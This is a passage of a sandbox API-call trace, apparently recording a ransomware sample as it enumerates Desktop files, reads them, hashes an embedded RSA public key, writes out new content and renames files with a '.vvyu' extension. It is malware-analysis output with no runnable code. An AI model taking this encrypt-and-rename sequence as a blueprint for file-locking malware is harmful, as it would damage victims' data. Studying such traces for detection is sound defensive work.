(HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9eba0 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.025] GetCurrentThreadId () returned 0x66c [0193.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93750 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937b0 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937c8 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93768 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93738 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0193.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95650 | out: hHeap=0x620000) returned 1 [0193.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.035] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x14b74, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x14b74, lpOverlapped=0x0) returned 1 [0193.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.036] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x14b79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.036] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.038] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.038] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.038] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.038] CloseHandle (hObject=0x568) returned 1 [0193.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0193.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0193.040] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\US8ywh8D_vcXiYflf5e.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\us8ywh8d_vcxiyflf5e.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\US8ywh8D_vcXiYflf5e.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\us8ywh8d_vcxiyflf5e.m4a.vvyu")) returned 1 [0193.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.042] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0193.045] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa350b110, ftCreationTime.dwHighDateTime=0x1d898fa, ftLastAccessTime.dwLowDateTime=0x90501470, ftLastAccessTime.dwHighDateTime=0x1d8a57a, ftLastWriteTime.dwLowDateTime=0x90501470, ftLastWriteTime.dwHighDateTime=0x1d8a57a, nFileSizeHigh=0x0, nFileSizeLow=0xc271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VgPttkDeNDF2VRfHy.pps", cAlternateFileName="VGPTTK~1.PPS")) returned 1 [0193.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95650 [0193.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95650 | out: hHeap=0x620000) returned 1 [0193.046] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\VgPttkDeNDF2VRfHy.pps") returned=".pps" [0193.046] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\VgPttkDeNDF2VRfHy.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\vgpttkdendf2vrfhy.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.046] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=49777) returned 1 [0193.046] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.049] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc24b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.049] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.050] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.050] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xc271, lpOverlapped=0x0) returned 1 [0193.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.051] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.052] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.052] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.053] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.053] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.053] GetLastError () returned 0x0 [0193.053] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.053] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.053] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.053] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.053] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc270) returned 0x2ea79b0 [0193.054] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95650 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0193.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.055] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93768 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93750 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.056] HeapFree (in: 